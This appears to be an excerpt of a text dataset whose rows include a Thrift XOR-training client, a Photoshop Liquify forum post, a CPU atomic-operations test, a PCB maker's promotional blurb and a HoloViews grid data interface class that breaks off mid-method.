text
stringlengths 29
850k
|
|---|
from erlang_python import ErlangPythonServices
from helper import get_host, get_port
from os.path import basename
from thrift import Thrift
from thrift.protocol import TBinaryProtocol
from thrift.transport import TSocket
from thrift.transport import TTransport
class Dbg(object):
    """Runtime debug switch: flip ``active`` to True for verbose tracing."""

    # Class-level flag shared by every instance; consulted before each
    # diagnostic ``print`` in this script.
    active = False


# Module-wide singleton used by main() and the __main__ guard below.
DEBUGGER = Dbg()
def main():
    """Run the XOR training demo against an Erlang/Python thrift server.

    Connects to the host/port reported by the helper module, builds a
    2-10-1 sigmoid network, feeds it the XOR truth table, trains it and
    prints the result of a final prediction. All work happens via the
    thrift ``ErlangPythonServices`` client; the transport is always
    closed, even if a call raises.
    """
    if DEBUGGER.active:
        print("{} - main (): Start".format(basename(__file__)))

    # --------------------------------------------------------------------------
    # Read network parameters
    # --------------------------------------------------------------------------
    host = get_host()
    port = get_port()

    print(("{} - main (): This client will connect to a server with " +
           "ip address {} and port number {}").format(basename(__file__), host, port))

    # --------------------------------------------------------------------------
    # Init thrift connection and protocol handlers
    # --------------------------------------------------------------------------
    # Make socket
    socket = TSocket.TSocket(host, port)
    # Buffering is critical. Raw sockets are very slow
    transport = TTransport.TBufferedTransport(socket)
    # Wrap in a protocol
    protocol = TBinaryProtocol.TBinaryProtocol(transport)
    # Create a client to use the protocol encoder
    client = ErlangPythonServices.Client(protocol)
    # Connect to server
    transport.open()

    try:
        # ----------------------------------------------------------------------
        # XOR Training: 2 inputs, one hidden layer of 10 sigmoid units,
        # 1 output — mirrors the Erlang session:
        # > annlink:create_neural_network(Conn, [2, 10, 1]).
        # {ClientId,<<"A3zfatHw5jIZVsVaNYDKAemgg0qvQ+le">>}
        # ----------------------------------------------------------------------
        num_inputs = 2
        num_outputs = 1
        learning_rate = 0.001
        model_id = client.initialize_model(num_inputs,
                                           num_outputs,
                                           learning_rate)

        client.add_layer(model_id, 10)
        client.add_activation(model_id, "sigmoid")
        client.add_layer(model_id, 1)

        # ----------------------------------------------------------------------
        # > Inputs = [[0,0],[0,1],[1,0],[1,1]].
        # > Labels = [[0],[1],[1],[0]].
        # > annlink:add_data_chunk(Conn, ClientId, Inputs, Labels).
        # ok
        # ----------------------------------------------------------------------
        inputs = [[0, 0], [0, 1], [1, 0], [1, 1]]
        labels = [[0], [1], [1], [0]]
        scale = []  # empty: no input scaling requested
        client.add_data_chunk(model_id, inputs, labels, scale)

        # ----------------------------------------------------------------------
        # > annlink:set_learning_rate(Conn, ClientId, 0.05).
        # ok
        # ----------------------------------------------------------------------
        client.set_learning_rate(model_id, 0.05)

        # ----------------------------------------------------------------------
        # Single warm-up epoch, then five rounds of 200 epochs each
        # (> [annlink:train(Conn, ClientId, 200) || _ <- lists:seq(1,5)].),
        # which should produce losses close to:
        # [0.126319688744843,0.05803197836337134,
        #  1.3663458995789856e-8,6.92154666914746e-17,
        #  6.938893903907228e-18]
        # ----------------------------------------------------------------------
        batch_size = 512
        result = client.train(model_id, 1, batch_size)
        if DEBUGGER.active:
            print("{} - model {} - main ({}): result from train".format(
                basename(__file__), model_id, result))

        for _ in range(5):
            result = client.train(model_id, 200, batch_size)
            if DEBUGGER.active:
                print("{} - model {} - main ({}): result from train".format(
                    basename(__file__), model_id, result))

        # ----------------------------------------------------------------------
        # >annlink:predict(Conn, ClientId, [[0,0], [0,1], [1,0], [1,1]]).
        # [[0.0],[1.0],[1.0],[0.0]]
        # ----------------------------------------------------------------------
        data = [[0, 0], [0, 1], [1, 0], [1, 1]]
        result = client.predict(model_id, data)
        if DEBUGGER.active:
            print(
                "{} - model {} - main ({}): result from predict".format(
                    basename(__file__), model_id, result))

        # Original had a stray trailing comma here, which built a throwaway
        # one-element tuple; a plain call is intended.
        client.terminate_model(model_id)
    finally:
        # ----------------------------------------------------------------------
        # Terminate client: always close the connection, even on errors.
        # ----------------------------------------------------------------------
        transport.close()

    if DEBUGGER.active:
        print("{} - main (): Done".format(basename(__file__)))
# Script entry point: run the XOR demo and report any thrift-level failure.
if __name__ == "__main__":
    if DEBUGGER.active:
        print("{} - __main__ (): Start".format(basename(__file__)))
    try:
        main()
        if DEBUGGER.active:
            print("{} - __main__ (): Done".format(basename(__file__)))
    except Thrift.TException as tx:
        # NOTE(review): relies on TException.message — presumably present in
        # the bundled thrift version; str(tx) would be the portable spelling.
        print("{} - __main__ (): Exception: {}".format(basename(__file__), tx.message))
|
After using the Liquify tool to change the size of the eyes or mouth, it leaves little ink spots all over the face. I am using CC 2019 on a Mac.
Perhaps a screen recording would help us understand the issue better.
I have updated my computer to Mojave 10.14, and it still shows the pixelated spots when I liquify areas. Please help.
|
#!/usr/bin/env python3
#
# Copyright 2011-2015 Jeff Bush
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Test load_sync/store_sync instructions.
This uses four threads to update variables round-robin.
"""
import os
import struct
import sys
sys.path.insert(0, '../..')
import test_harness
MEM_DUMP_FILE = os.path.join(test_harness.WORK_DIR, 'vmem.bin')
@test_harness.test(['verilator'])
def atomic(_, target):
    """Build and run atomic.S, then check every word of the memory dump.

    The program's four threads update counters round-robin; afterwards all
    512 little-endian words in the 0x800-byte dump at 0x100000 must be 10.
    """
    hex_file = test_harness.build_program(['atomic.S'])
    test_harness.run_program(
        hex_file,
        target,
        dump_file=MEM_DUMP_FILE,
        dump_base=0x100000,
        dump_length=0x800,
        flush_l2=True)

    # Read the whole dump in one go rather than word-by-word.
    with open(MEM_DUMP_FILE, 'rb') as memfile:
        dump = memfile.read(512 * 4)

    if len(dump) < 512 * 4:
        raise test_harness.TestException('output file is truncated')

    for num_val, in struct.iter_unpack('<L', dump):
        if num_val != 10:
            raise test_harness.TestException(
                'FAIL: mismatch: ' + str(num_val))
# Discover and run every @test_harness.test-decorated test in this module.
test_harness.execute_tests()
|
A leading PCB manufacturer and circuit supplier offering the world's largest selection of electronic circuit board components in Canada and the United States, built to international standards. Synergise PCB Inc is a quick-turn PCB maker producing double-sided, multilayer and flexible printed circuit (FPC) boards with advanced production technology. For over 14 years we have been an on-time, quality supplier of circuit board components, serving customers locally and by shipping worldwide.
|
from __future__ import absolute_import
import sys
import datetime as dt
from collections import OrderedDict, defaultdict, Iterable
try:
import itertools.izip as zip
except ImportError:
pass
import numpy as np
from .dictionary import DictInterface
from .interface import Interface, DataError
from ..dimension import dimension_name
from ..element import Element
from ..dimension import OrderedDict as cyODict
from ..ndmapping import NdMapping, item_check, sorted_context
from .. import util
from .interface import is_dask, dask_array_module, get_array_types
class GridInterface(DictInterface):
    """
    Interface for simple dictionary-based dataset format using a
    compressed representation that uses the cartesian product between
    key dimensions. As with DictInterface, the dictionary keys correspond
    to the column (i.e dimension) names and the values are NumPy arrays
    representing the values in that column.

    To use this compressed format, the key dimensions must be orthogonal
    to one another with each key dimension specifying an axis of the
    multidimensional space occupied by the value dimension data. For
    instance, given an temperature recordings sampled regularly across
    the earth surface, a list of N unique latitudes and M unique
    longitudes can specify the position of NxM temperature samples.
    """

    # Raw data containers this interface accepts.
    types = (dict, OrderedDict, cyODict)

    # Identifier used when selecting an interface by name.
    datatype = 'grid'

    # Marks this as a gridded (as opposed to columnar) interface.
    gridded = True

    @classmethod
    def init(cls, eltype, data, kdims, vdims):
        """Coerce ``data`` into the grid dict format and validate shapes.

        Accepts tuples, lists, ndarrays or dicts; returns the normalized
        data dict together with the resolved kdims/vdims. Raises
        ValueError/TypeError/DataError when dimensions are missing or the
        value-array shapes do not match the key-dimension lengths.
        """
        if kdims is None:
            kdims = eltype.kdims
        if vdims is None:
            vdims = eltype.vdims

        if not vdims:
            raise ValueError('GridInterface interface requires at least '
                             'one value dimension.')

        ndims = len(kdims)
        dimensions = [dimension_name(d) for d in kdims+vdims]
        if isinstance(data, tuple):
            data = {d: v for d, v in zip(dimensions, data)}
        elif isinstance(data, list) and data == []:
            data = OrderedDict([(d, []) for d in dimensions])
        elif not any(isinstance(data, tuple(t for t in interface.types if t is not None))
                     for interface in cls.interfaces.values()):
            # Not a type any registered interface understands: treat as
            # an iterable of rows and transpose into columns.
            data = {k: v for k, v in zip(dimensions, zip(*data))}
        elif isinstance(data, np.ndarray):
            if data.ndim == 1:
                if eltype._auto_indexable_1d and len(kdims)+len(vdims)>1:
                    # Auto-generate an integer index column for 1D input.
                    data = np.column_stack([np.arange(len(data)), data])
                else:
                    data = np.atleast_2d(data).T
            data = {k: data[:,i] for i,k in enumerate(dimensions)}
        elif isinstance(data, list) and data == []:
            # NOTE(review): unreachable — the identical condition above
            # already handled the empty list; confirm intended.
            data = {d: np.array([]) for d in dimensions[:ndims]}
            data.update({d: np.empty((0,) * ndims) for d in dimensions[ndims:]})
        elif not isinstance(data, dict):
            raise TypeError('GridInterface must be instantiated as a '
                            'dictionary or tuple')

        # Ensure every declared dimension is present and array-backed.
        for dim in kdims+vdims:
            name = dimension_name(dim)
            if name not in data:
                raise ValueError("Values for dimension %s not found" % dim)
            if not isinstance(data[name], get_array_types()):
                data[name] = np.array(data[name])

        kdim_names = [dimension_name(d) for d in kdims]
        vdim_names = [dimension_name(d) for d in vdims]
        # Expected value-array shape is the product of kdim lengths
        # (reversed, since arrays are stored with the last kdim first).
        expected = tuple([len(data[kd]) for kd in kdim_names])
        irregular_shape = data[kdim_names[0]].shape if kdim_names else ()
        valid_shape = irregular_shape if len(irregular_shape) > 1 else expected[::-1]
        shapes = tuple([data[kd].shape for kd in kdim_names])
        for vdim in vdim_names:
            shape = data[vdim].shape
            error = DataError if len(shape) > 1 else ValueError
            if (not expected and shape == (1,)) or (len(set((shape,)+shapes)) == 1 and len(shape) > 1):
                # If empty or an irregular mesh
                pass
            elif len(shape) != len(expected):
                raise error('The shape of the %s value array does not '
                            'match the expected dimensionality indicated '
                            'by the key dimensions. Expected %d-D array, '
                            'found %d-D array.' % (vdim, len(expected), len(shape)))
            elif any((s!=e and (s+1)!=e) for s, e in zip(shape, valid_shape)):
                # (s+1)==e tolerates bin-edge coordinates (binned data).
                raise error('Key dimension values and value array %s '
                            'shapes do not match. Expected shape %s, '
                            'actual shape: %s' % (vdim, valid_shape, shape), cls)
        return data, {'kdims':kdims, 'vdims':vdims}, {}

    @classmethod
    def concat(cls, datasets, dimensions, vdims):
        """Concatenate multiple gridded datasets along ``dimensions``.

        Recurses over all but the last dimension, then stacks arrays
        along each dimension in turn via ``concat_dim``.
        """
        from . import Dataset
        with sorted_context(False):
            datasets = NdMapping(datasets, kdims=dimensions)
            datasets = datasets.clone([(k, v.data if isinstance(v, Dataset) else v)
                                       for k, v in datasets.data.items()])
        if len(datasets.kdims) > 1:
            items = datasets.groupby(datasets.kdims[:-1]).data.items()
            return cls.concat([(k, cls.concat(v, v.kdims, vdims=vdims)) for k, v in items],
                              datasets.kdims[:-1], vdims)
        return cls.concat_dim(datasets, datasets.kdims[0], vdims)

    @classmethod
    def concat_dim(cls, datasets, dim, vdims):
        """Stack the value arrays of ``datasets`` along a new ``dim`` axis."""
        values, grids = zip(*datasets.items())
        new_data = {k: v for k, v in grids[0].items() if k not in vdims}
        new_data[dim.name] = np.array(values)
        for vdim in vdims:
            arrays = [grid[vdim.name] for grid in grids]
            shapes = set(arr.shape for arr in arrays)
            if len(shapes) > 1:
                raise DataError('When concatenating gridded data the shape '
                                'of arrays must match. %s found that arrays '
                                'along the %s dimension do not match.' %
                                (cls.__name__, vdim.name))
            # Use dask's stack if any input is a dask array.
            stack = dask_array_module().stack if any(is_dask(arr) for arr in arrays) else np.stack
            new_data[vdim.name] = stack(arrays, -1)
        return new_data

    @classmethod
    def irregular(cls, dataset, dim):
        """Whether ``dim``'s coordinates are multi-dimensional (a mesh)."""
        return dataset.data[dimension_name(dim)].ndim > 1

    @classmethod
    def isscalar(cls, dataset, dim):
        """Whether ``dim`` holds a single (or single unique) value."""
        values = cls.values(dataset, dim, expanded=False)
        return values.shape in ((), (1,)) or len(np.unique(values)) == 1

    @classmethod
    def validate(cls, dataset, vdims=True):
        """Delegate validation to the base Interface."""
        Interface.validate(dataset, vdims)

    @classmethod
    def dimension_type(cls, dataset, dim):
        """Return the NumPy scalar type of ``dim``, or None if unknown."""
        if dim in dataset.dimensions():
            arr = cls.values(dataset, dim, False, False)
        else:
            return None
        return arr.dtype.type

    @classmethod
    def shape(cls, dataset, gridded=False):
        """Shape of the first value array (gridded) or (rows, cols) (flat)."""
        shape = dataset.data[dataset.vdims[0].name].shape
        if gridded:
            return shape
        else:
            # NOTE(review): np.product is a legacy alias (removed in
            # NumPy 2.0); np.prod is the modern spelling.
            return (np.product(shape, dtype=np.intp), len(dataset.dimensions()))

    @classmethod
    def length(cls, dataset):
        """Number of samples in the flattened representation."""
        return cls.shape(dataset)[0]

    @classmethod
    def _infer_interval_breaks(cls, coord, axis=0):
        """
        >>> GridInterface._infer_interval_breaks(np.arange(5))
        array([-0.5,  0.5,  1.5,  2.5,  3.5,  4.5])
        >>> GridInterface._infer_interval_breaks([[0, 1], [3, 4]], axis=1)
        array([[-0.5,  0.5,  1.5],
               [ 2.5,  3.5,  4.5]])
        """
        coord = np.asarray(coord)
        if sys.version_info.major == 2 and len(coord) and isinstance(coord[0], (dt.datetime, dt.date)):
            # np.diff does not work on datetimes in python 2
            coord = coord.astype('datetime64')
        if len(coord) == 0:
            return np.array([], dtype=coord.dtype)
        # Midpoints between samples, extrapolated half a step at each end.
        deltas = 0.5 * np.diff(coord, axis=axis)
        first = np.take(coord, [0], axis=axis) - np.take(deltas, [0], axis=axis)
        last = np.take(coord, [-1], axis=axis) + np.take(deltas, [-1], axis=axis)
        trim_last = tuple(slice(None, -1) if n == axis else slice(None)
                          for n in range(coord.ndim))
        return np.concatenate([first, coord[trim_last] + deltas, last], axis=axis)

    @classmethod
    def coords(cls, dataset, dim, ordered=False, expanded=False, edges=False):
        """
        Returns the coordinates along a dimension.  Ordered ensures
        coordinates are in ascending order and expanded creates
        ND-array matching the dimensionality of the dataset.
        """
        dim = dataset.get_dimension(dim, strict=True)
        irregular = cls.irregular(dataset, dim)
        if irregular or expanded:
            if irregular:
                data = dataset.data[dim.name]
            else:
                data = util.expand_grid_coords(dataset, dim)
            if edges and data.shape == dataset.data[dataset.vdims[0].name].shape:
                # Coordinates are cell centers: infer edges on both axes.
                data = cls._infer_interval_breaks(data, axis=1)
                data = cls._infer_interval_breaks(data, axis=0)
            return data

        data = dataset.data[dim.name]
        if ordered and np.all(data[1:] < data[:-1]):
            # Descending coordinates: flip to ascending.
            data = data[::-1]
        shape = cls.shape(dataset, True)

        if dim in dataset.kdims:
            idx = dataset.get_dimension_index(dim)
            # Coordinates one longer than the value axis are bin edges.
            isedges = (dim in dataset.kdims and len(shape) == dataset.ndims
                       and len(data) == (shape[dataset.ndims-idx-1]+1))
        else:
            isedges = False
        if edges and not isedges:
            data = cls._infer_interval_breaks(data)
        elif not edges and isedges:
            # Convert edges back to cell centers.
            data = data[:-1] + np.diff(data)/2.
        return data

    @classmethod
    def canonicalize(cls, dataset, data, data_coords=None, virtual_coords=[]):
        """
        Canonicalize takes an array of values as input and reorients
        and transposes it to match the canonical format expected by
        plotting functions. In certain cases the dimensions defined
        via the kdims of an Element may not match the dimensions of
        the underlying data. A set of data_coords may be passed in to
        define the dimensionality of the data, which can then be used
        to np.squeeze the data to remove any constant dimensions. If
        the data is also irregular, i.e. contains multi-dimensional
        coordinates, a set of virtual_coords can be supplied, required
        by some interfaces (e.g. xarray) to index irregular datasets
        with a virtual integer index. This ensures these coordinates
        are not simply dropped.

        NOTE(review): ``virtual_coords=[]`` is a mutable default; safe
        only because it is never mutated here — confirm before reuse.
        """
        if data_coords is None:
            data_coords = dataset.dimensions('key', label='name')[::-1]

        # Transpose data
        dims = [name for name in data_coords
                if isinstance(cls.coords(dataset, name), get_array_types())]
        dropped = [dims.index(d) for d in dims
                   if d not in dataset.kdims+virtual_coords]
        if dropped:
            data = np.squeeze(data, axis=tuple(dropped))

        if not any(cls.irregular(dataset, d) for d in dataset.kdims):
            inds = [dims.index(kd.name) for kd in dataset.kdims]
            # Adjust indices for axes removed by the squeeze above.
            inds = [i - sum([1 for d in dropped if i>=d]) for i in inds]
            if inds:
                data = data.transpose(inds[::-1])

        # Reorient data: flip axes whose coordinates are descending.
        invert = False
        slices = []
        for d in dataset.kdims[::-1]:
            coords = cls.coords(dataset, d)
            if np.all(coords[1:] < coords[:-1]) and not coords.ndim > 1:
                slices.append(slice(None, None, -1))
                invert = True
            else:
                slices.append(slice(None))
        data = data[tuple(slices)] if invert else data

        # Allow lower dimensional views into data
        if len(dataset.kdims) < 2:
            data = data.flatten()
        return data

    @classmethod
    def invert_index(cls, index, length):
        """Mirror an index/slice/iterable of indices about ``length``."""
        if np.isscalar(index):
            return length - index
        elif isinstance(index, slice):
            start, stop = index.start, index.stop
            new_start, new_stop = None, None
            if start is not None:
                new_stop = length - start
            if stop is not None:
                new_start = length - stop
            # NOTE(review): if either bound is None this raises TypeError
            # (None-1); presumably callers always pass bounded slices —
            # confirm.
            return slice(new_start-1, new_stop-1)
        elif isinstance(index, Iterable):
            new_index = []
            for ind in index:
                new_index.append(length-ind)
            return new_index

    @classmethod
    def ndloc(cls, dataset, indices):
        """Index the grid by integer position along each (reversed) kdim.

        Returns a scalar when all indices are scalar and there is a
        single vdim, otherwise a tuple of selected columns.
        """
        selected = {}
        adjusted_inds = []
        all_scalar = True
        for i, (kd, ind) in enumerate(zip(dataset.kdims[::-1], indices)):
            coords = cls.coords(dataset, kd.name, True)
            if np.isscalar(ind):
                ind = [ind]
            else:
                all_scalar = False
            selected[kd.name] = coords[ind]
            adjusted_inds.append(ind)
        # Unindexed kdims are kept in full.
        for kd in dataset.kdims:
            if kd.name not in selected:
                coords = cls.coords(dataset, kd.name)
                selected[kd.name] = coords
                all_scalar = False
        for d in dataset.dimensions():
            if d in dataset.kdims and not cls.irregular(dataset, d):
                continue
            arr = cls.values(dataset, d, flat=False, compute=False)
            if all_scalar and len(dataset.vdims) == 1:
                return arr[tuple(ind[0] for ind in adjusted_inds)]
            selected[d.name] = arr[tuple(adjusted_inds)]
        return tuple(selected[d.name] for d in dataset.dimensions())

    @classmethod
    def values(cls, dataset, dim, expanded=True, flat=True, compute=True):
        """Return the values along ``dim``.

        vdims (and irregular kdims) are canonicalized and optionally
        flattened/computed; regular kdims are returned as coordinates,
        expanded to the full grid when ``expanded`` is True.
        """
        dim = dataset.get_dimension(dim, strict=True)
        if dim in dataset.vdims or dataset.data[dim.name].ndim > 1:
            data = dataset.data[dim.name]
            data = cls.canonicalize(dataset, data)
            da = dask_array_module()
            if compute and da and isinstance(data, da.Array):
                data = data.compute()
            return data.T.flatten() if flat else data
        elif expanded:
            data = cls.coords(dataset, dim.name, expanded=True)
            return data.T.flatten() if flat else data
        else:
            return cls.coords(dataset, dim.name, ordered=True)

    @classmethod
    def groupby(cls, dataset, dim_names, container_type, group_type, **kwargs):
        """Group the dataset along ``dim_names``.

        Iterates the cartesian product of the grouping coordinates,
        selecting a sub-grid for each key and wrapping it in
        ``group_type``; the groups are returned in ``container_type``.
        Irregular dimensions cannot be grouped.
        """
        # Get dimensions information
        dimensions = [dataset.get_dimension(d, strict=True) for d in dim_names]
        if 'kdims' in kwargs:
            kdims = kwargs['kdims']
        else:
            kdims = [kdim for kdim in dataset.kdims if kdim not in dimensions]
            kwargs['kdims'] = kdims

        invalid = [d for d in dimensions if dataset.data[d.name].ndim > 1]
        if invalid:
            if len(invalid) == 1: invalid = "'%s'" % invalid[0]
            raise ValueError("Cannot groupby irregularly sampled dimension(s) %s."
                             % invalid)

        # Update the kwargs appropriately for Element group types
        group_kwargs = {}
        group_type = dict if group_type == 'raw' else group_type
        if issubclass(group_type, Element):
            group_kwargs.update(util.get_param_values(dataset))
        else:
            kwargs.pop('kdims')
        group_kwargs.update(kwargs)

        # Whether grouping drops a dimension from the resulting groups.
        drop_dim = any(d not in group_kwargs['kdims'] for d in kdims)

        # Find all the keys along supplied dimensions
        keys = [cls.coords(dataset, d.name) for d in dimensions]
        transpose = [dataset.ndims-dataset.kdims.index(kd)-1 for kd in kdims]
        transpose += [i for i in range(dataset.ndims) if i not in transpose]

        # Iterate over the unique entries applying selection masks
        grouped_data = []
        for unique_key in zip(*util.cartesian_product(keys)):
            select = dict(zip(dim_names, unique_key))
            if drop_dim:
                group_data = dataset.select(**select)
                group_data = group_data if np.isscalar(group_data) else group_data.columns()
            else:
                group_data = cls.select(dataset, **select)

            if np.isscalar(group_data) or (isinstance(group_data, get_array_types()) and group_data.shape == ()):
                group_data = {dataset.vdims[0].name: np.atleast_1d(group_data)}
                for dim, v in zip(dim_names, unique_key):
                    group_data[dim] = np.atleast_1d(v)
            elif not drop_dim:
                if isinstance(group_data, get_array_types()):
                    group_data = {dataset.vdims[0].name: group_data}
                for vdim in dataset.vdims:
                    data = group_data[vdim.name]
                    data = data.transpose(transpose[::-1])
                    group_data[vdim.name] = np.squeeze(data)
            group_data = group_type(group_data, **group_kwargs)
            grouped_data.append((tuple(unique_key), group_data))

        if issubclass(container_type, NdMapping):
            with item_check(False):
                return container_type(grouped_data, kdims=dimensions)
        else:
            return container_type(grouped_data)

    @classmethod
    def key_select_mask(cls, dataset, values, ind):
        """Build a boolean mask over ``values`` for a selection spec ``ind``.

        Supports arrays (used verbatim), slices, sets/lists of values,
        callables, None (no mask) and scalars (with nearest-neighbour
        fallback for 1D/binned datasets).
        """
        if isinstance(ind, tuple):
            ind = slice(*ind)
        if isinstance(ind, get_array_types()):
            mask = ind
        elif isinstance(ind, slice):
            mask = True
            if ind.start is not None:
                mask &= ind.start <= values
            if ind.stop is not None:
                mask &= values < ind.stop
            # Expand empty mask
            if mask is True:
                # NOTE(review): np.bool is a deprecated alias (removed in
                # NumPy>=1.24); plain bool is the modern spelling.
                mask = np.ones(values.shape, dtype=np.bool)
        elif isinstance(ind, (set, list)):
            iter_slcs = []
            for ik in ind:
                iter_slcs.append(values == ik)
            mask = np.logical_or.reduce(iter_slcs)
        elif callable(ind):
            mask = ind(values)
        elif ind is None:
            mask = None
        else:
            index_mask = values == ind
            if (dataset.ndims == 1 or dataset._binned) and np.sum(index_mask) == 0:
                # No exact match: fall back to the nearest coordinate.
                data_index = np.argmin(np.abs(values - ind))
                mask = np.zeros(len(values), dtype=np.bool)
                mask[data_index] = True
            else:
                mask = index_mask
        if mask is None:
            mask = np.ones(values.shape, dtype=bool)
        return mask

    @classmethod
    def select(cls, dataset, selection_mask=None, **selection):
        """Apply key-dimension selections to the compressed grid.

        Builds a per-dimension mask, slices coordinates and value
        arrays accordingly and returns either the reduced data dict or,
        for a fully-indexed selection, the scalar/array of vdim values.
        Value dimensions cannot be sliced in this format.
        """
        dimensions = dataset.kdims
        val_dims = [vdim for vdim in dataset.vdims if vdim in selection]
        if val_dims:
            raise IndexError('Cannot slice value dimensions in compressed format, '
                             'convert to expanded format before slicing.')

        indexed = cls.indexed(dataset, selection)
        full_selection = [(d, selection.get(d.name, selection.get(d.label)))
                          for d in dimensions]
        data = {}
        value_select = []
        for i, (dim, ind) in enumerate(full_selection):
            irregular = cls.irregular(dataset, dim)
            values = cls.coords(dataset, dim, irregular)
            mask = cls.key_select_mask(dataset, values, ind)
            if irregular:
                if np.isscalar(ind) or isinstance(ind, (set, list)):
                    raise IndexError("Indexing not supported for irregularly "
                                     "sampled data. %s value along %s dimension."
                                     "must be a slice or 2D boolean mask."
                                     % (ind, dim))
                mask = mask.max(axis=i)
            elif dataset._binned:
                # Binned data: selection is resolved against bin edges.
                edges = cls.coords(dataset, dim, False, edges=True)
                inds = np.argwhere(mask)
                if np.isscalar(ind):
                    emin, emax = edges.min(), edges.max()
                    if ind < emin:
                        raise IndexError("Index %s less than lower bound "
                                         "of %s for %s dimension." % (ind, emin, dim))
                    elif ind >= emax:
                        raise IndexError("Index %s more than or equal to upper bound "
                                         "of %s for %s dimension." % (ind, emax, dim))
                    idx = max([np.digitize([ind], edges)[0]-1, 0])
                    mask = np.zeros(len(values), dtype=np.bool)
                    mask[idx] = True
                    values = edges[idx:idx+2]
                elif len(inds):
                    values = edges[inds.min(): inds.max()+2]
                else:
                    values = edges[0:0]
            else:
                values = values[mask]
            values, mask = np.asarray(values), np.asarray(mask)
            value_select.append(mask)
            data[dim.name] = np.array([values]) if np.isscalar(values) else values

        # Convert the per-dimension masks into an orthogonal index.
        int_inds = [np.argwhere(v) for v in value_select][::-1]
        index = np.ix_(*[np.atleast_1d(np.squeeze(ind)) if ind.ndim > 1 else np.atleast_1d(ind)
                         for ind in int_inds])

        for kdim in dataset.kdims:
            # NOTE(review): `dim` here is the loop variable left over from
            # the selection loop above; presumably `kdim` was intended —
            # confirm against upstream.
            if cls.irregular(dataset, dim):
                da = dask_array_module()
                if da and isinstance(dataset.data[kdim.name], da.Array):
                    data[kdim.name] = dataset.data[kdim.name].vindex[index]
                else:
                    data[kdim.name] = np.asarray(data[kdim.name])[index]

        for vdim in dataset.vdims:
            da = dask_array_module()
            if da and isinstance(dataset.data[vdim.name], da.Array):
                data[vdim.name] = dataset.data[vdim.name].vindex[index]
            else:
                data[vdim.name] = np.asarray(dataset.data[vdim.name])[index]

        if indexed:
            if len(dataset.vdims) == 1:
                da = dask_array_module()
                arr = np.squeeze(data[dataset.vdims[0].name])
                if da and isinstance(arr, da.Array):
                    arr = arr.compute()
                return arr if np.isscalar(arr) else arr[()]
            else:
                return np.array([np.squeeze(data[vd.name])
                                 for vd in dataset.vdims])
        return data

    @classmethod
    def sample(cls, dataset, samples=[]):
        """
        Samples the gridded data into dataset of samples.
        """
        ndims = dataset.ndims
        dimensions = dataset.dimensions(label='name')
        arrays = [dataset.data[vdim.name] for vdim in dataset.vdims]
        data = defaultdict(list)

        for sample in samples:
            if np.isscalar(sample): sample = [sample]
            if len(sample) != ndims:
                # Pad partial samples with None (no constraint).
                sample = [sample[i] if i < len(sample) else None
                          for i in range(ndims)]
            sampled, int_inds = [], []
            for d, ind in zip(dimensions, sample):
                cdata = dataset.data[d]
                mask = cls.key_select_mask(dataset, cdata, ind)
                inds = np.arange(len(cdata)) if mask is None else np.argwhere(mask)
                int_inds.append(inds)
                sampled.append(cdata[mask])
            for d, arr in zip(dimensions, np.meshgrid(*sampled)):
                data[d].append(arr)
            for vdim, array in zip(dataset.vdims, arrays):
                da = dask_array_module()
                flat_index = np.ravel_multi_index(tuple(int_inds)[::-1], array.shape)
                if da and isinstance(array, da.Array):
                    data[vdim.name].append(array.flatten().vindex[tuple(flat_index)])
                else:
                    data[vdim.name].append(array.flat[flat_index])
        concatenated = {d: np.concatenate(arrays).flatten() for d, arrays in data.items()}
        return concatenated

    @classmethod
    def aggregate(cls, dataset, kdims, function, **kwargs):
        """Aggregate vdims with ``function`` over all kdims not in ``kdims``.

        Returns the reduced data dict and the list of vdims whose values
        could not be aggregated (TypeError from ``function``).
        """
        kdims = [dimension_name(kd) for kd in kdims]
        data = {kdim: dataset.data[kdim] for kdim in kdims}
        # Axes to reduce: all kdims not retained (reversed storage order).
        axes = tuple(dataset.ndims-dataset.get_dimension_index(kdim)-1
                     for kdim in dataset.kdims if kdim not in kdims)
        da = dask_array_module()
        dropped = []
        for vdim in dataset.vdims:
            values = dataset.data[vdim.name]
            atleast_1d = da.atleast_1d if is_dask(values) else np.atleast_1d
            try:
                data[vdim.name] = atleast_1d(function(values, axis=axes, **kwargs))
            except TypeError:
                dropped.append(vdim)
        return data, dropped

    @classmethod
    def reindex(cls, dataset, kdims, vdims):
        """Drop/reorder dimensions, squeezing constant dropped kdims.

        Falls back to the expanded columnar representation when a
        dropped kdim holds more than one value.
        """
        dropped_kdims = [kd for kd in dataset.kdims if kd not in kdims]
        dropped_vdims = ([vdim for vdim in dataset.vdims
                          if vdim not in vdims] if vdims else [])
        constant = {}
        for kd in dropped_kdims:
            vals = cls.values(dataset, kd.name, expanded=False)
            if len(vals) == 1:
                constant[kd.name] = vals[0]
        data = {k: values for k, values in dataset.data.items()
                if k not in dropped_kdims+dropped_vdims}

        if len(constant) == len(dropped_kdims):
            joined_dims = kdims+dropped_kdims
            axes = tuple(dataset.ndims-dataset.kdims.index(d)-1
                         for d in joined_dims)
            dropped_axes = tuple(dataset.ndims-joined_dims.index(d)-1
                                 for d in dropped_kdims)
            for vdim in vdims:
                vdata = data[vdim.name]
                if len(axes) > 1:
                    vdata = vdata.transpose(axes[::-1])
                if dropped_axes:
                    vdata = np.squeeze(vdata, axis=dropped_axes)
                data[vdim.name] = vdata
            return data
        elif dropped_kdims:
            return tuple(dataset.columns(kdims+vdims).values())
        return data

    @classmethod
    def add_dimension(cls, dataset, dimension, dim_pos, values, vdim):
        """Add a value dimension; key dimensions cannot be added to a grid."""
        if not vdim:
            raise Exception("Cannot add key dimension to a dense representation.")
        dim = dimension_name(dimension)
        return dict(dataset.data, **{dim: values})

    @classmethod
    def sort(cls, dataset, by=[], reverse=False):
        """Grids are inherently ordered; only the identity sort is allowed."""
        if not by or by in [dataset.kdims, dataset.dimensions()]:
            return dataset.data
        else:
            raise Exception('Compressed format cannot be sorted, either instantiate '
                            'in the desired order or use the expanded format.')

    @classmethod
    def iloc(cls, dataset, index):
        """Position-based indexing over the flattened (rows, cols) view."""
        rows, cols = index
        scalar = False
        if np.isscalar(cols):
            scalar = np.isscalar(rows)
            cols = [dataset.get_dimension(cols, strict=True)]
        elif isinstance(cols, slice):
            cols = dataset.dimensions()[cols]
        else:
